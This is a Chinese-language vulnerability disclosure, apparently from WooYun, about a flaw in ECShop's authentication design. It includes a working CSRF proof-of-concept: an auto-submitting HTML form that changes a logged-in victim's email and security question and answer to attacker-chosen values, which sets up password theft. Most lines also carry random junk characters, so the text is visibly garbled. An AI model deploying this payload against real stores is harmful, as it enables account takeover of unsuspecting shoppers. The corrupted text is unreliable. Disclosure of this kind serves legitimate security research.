简要描述:+ n# O4 v5 A2 {
ecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现
" F! u& K: n% d% s6 v" [% \: S% o- [" G6 F
Demo For:http://www.wooyun.org/bug.php?action=view&id=395: i. G6 z! C; m; e
1 ~. J! j5 P! |详细说明:5 b4 b4 X/ C) t. K8 S
利用csrf和xss可以突破官方所说的“障碍”+ b9 m. B& z- q5 ~' L
xss版本已经有人说明7 R1 P7 L% I& o( I
这里给出csrf版本
9 `8 t& |* O( c3 d/ M" G% g& d+ C0 ]5 L, N& u
漏洞证明:
5 V$ S/ e3 }! G( P) Y1 G<html>
3 h# y: M1 x' P! x7 o0 v<body>% Z4 C' p* ^9 H0 z; B& ?$ I5 z/ B
<form action="http://www.wooyun.org/ecshop/user.php" method="POST">
9 F U0 @% V' J* d<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">
( _' i ~* B0 F' S8 o<INPUT TYPE="text" NAME="act" value="act_edit_profile">. A. w( k. V1 B, `4 ?
<INPUT TYPE="text" NAME="sel_question" value="ecshop">. S3 i( c* o$ h: l" ]; S
<INPUT TYPE="text" NAME="passwd_answer" value="exploit">" u( l( N1 s; ~2 g) v+ z) p- C. s- e
</body>0 `/ ?& Z- ?7 K2 p ^$ O
<script>
f- Z. H; C4 q& {document.forms[0].submit();
0 z& B7 n; R$ u2 U5 y7 K e</script>
( ~) @/ V5 `9 S& g* m</html>
( J" L/ l4 e: p$ }构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失
$ L ?, b4 G B7 A; q. n$ k$ G3 \" \% G9 i& b, o; a$ S" q
|